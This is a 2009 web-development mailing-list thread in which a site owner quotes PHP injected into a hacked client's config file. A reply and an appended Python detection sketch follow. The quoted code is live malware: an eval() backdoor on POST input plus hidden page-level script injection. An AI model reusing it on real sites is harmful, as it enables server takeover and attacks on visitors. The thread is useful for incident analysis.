[thelist] Client site hacked - need help understanding inserted PHP code

John Corry jcorry at gmail.com
Wed Mar 25 16:37:56 CDT 2009


It's trying to add some JavaScript function to your page and call it,
probably onload.

Useful for an XSS attack.

John Corry
email: jcorry at gmail.com




On Mar 25, 2009, at 5:34 PM, CosmicFawn wrote:

> I have a client whose website was hacked into in the last few days. I
> know for sure that someone was in there because they've added some PHP
> code to my dbinfo file. I was wondering if someone out there with more
> PHP knowledge than I have can tell me what this code is designed to do.
>
> if(!function_exists('tmp_lkojfghx')) 
> {if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(! 
> defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0M5V3N4RGxjcjBvaXB0OVclMjBzT21yamNjJTNEJTJGa3IlMkY5NCUyRTlXMjRqYzclMkUyJTJFMTk5VzUlMkZqcTBvdWVPbXIwb3klMkVGQmpzJTNFJTNDJTJGT21zY0ZCcmlrcnB0amMlM0UnKS5yZXBsYWNlKC9qY3xrcnxxcnxGQnxPbXwyb3wwb3w5V3x4RGwvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function
> tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)) 
> $s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</ 
> script>#is',$s,$a))foreach($a[0]
> as
> $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\ 
> [\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#', 
> $v);if((preg_match('#\beval\b#',$v)&&($e|| 
> strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write'))) 
> $s=str_replace($v,'',$s);}$s1=preg_replace('#<script
> language=javascript><!-- \ndocument\.write\(unescape\(.+?\n
> --></script>#','',$s);if(stristr($s,'<body')) 
> $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!= 
> $s)||stristr($s,'</body')||stristr($s,'</title>'))$s= 
> $s1.TMP_XHGFJOKL;return
> $g?gzencode($s):$s;}function
> tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&& 
> $GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a, 
> $b,$c,$d);foreach(@ob_get_status(1)
> as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else
> $s[]=array($a=='default output
> handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i] 
> [1 
> ]= 
> ob_get_contents 
> ();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i+ 
> +){ob_start($s[$i][0]);echo
> $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))! 
> ='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
>
> Thanks so much.
>
> Rae.

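A triage sketch for checking other PHP files on the same host, added here as an example and not part of the original thread: it flags the traits visible in the quoted code (eval of a POST field, a named ob_start callback, a set_error_handler hook, a script tag hidden in a base64 literal) without executing anything. The regexes, function names and sample strings are this example's own constructions.

```python
import base64
import re

# Traits visible in the quoted injection; the regexes are this example's own.
INDICATORS = {
    "eval-of-request-input": re.compile(
        r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "output-buffer-callback": re.compile(r"\bob_start\s*\(\s*['\"]\w+['\"]"),
    "error-handler-hook": re.compile(r"\bset_error_handler\s*\(\s*['\"]\w+['\"]"),
}
# A long string literal passed straight to base64_decode().
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]{40,})['\"]")


def decoded_literals(php_source):
    """Statically decode base64_decode('...') literals; no PHP is executed."""
    decoded = []
    for match in B64_CALL.finditer(php_source):
        blob = re.sub(r"\s+", "", match.group(1))  # undo mail/editor line wraps
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error subclasses ValueError
            continue
    return decoded


def triage(php_source):
    """Return the sorted names of every indicator found in one PHP file."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(php_source)}
    if any("<script" in text.lower() for text in decoded_literals(php_source)):
        hits.add("base64-hidden-script-tag")
    return sorted(hits)


# Constructed samples, not taken from the compromised site.
_HIDDEN = base64.b64encode(b"<script src=//example.invalid/x.js></script>").decode()
INFECTED = (
    "<?php $db_host='localhost';\n"
    "if(isset($_POST['tmp_a3']))eval($_POST['tmp_a3']);\n"
    "define('TMP_A',base64_decode('" + _HIDDEN + "'));\n"
    "set_error_handler('tmp_a2');ob_start('tmp_a');\n"
)
CLEAN = "<?php $db_host='localhost'; ob_start(); echo base64_decode($row['img']);\n"

if __name__ == "__main__":
    for label, source in (("infected", INFECTED), ("clean", CLEAN)):
        print(label, triage(source))
```

A hit list like this is a lead for manual review; an empty result does not show that a file is untouched.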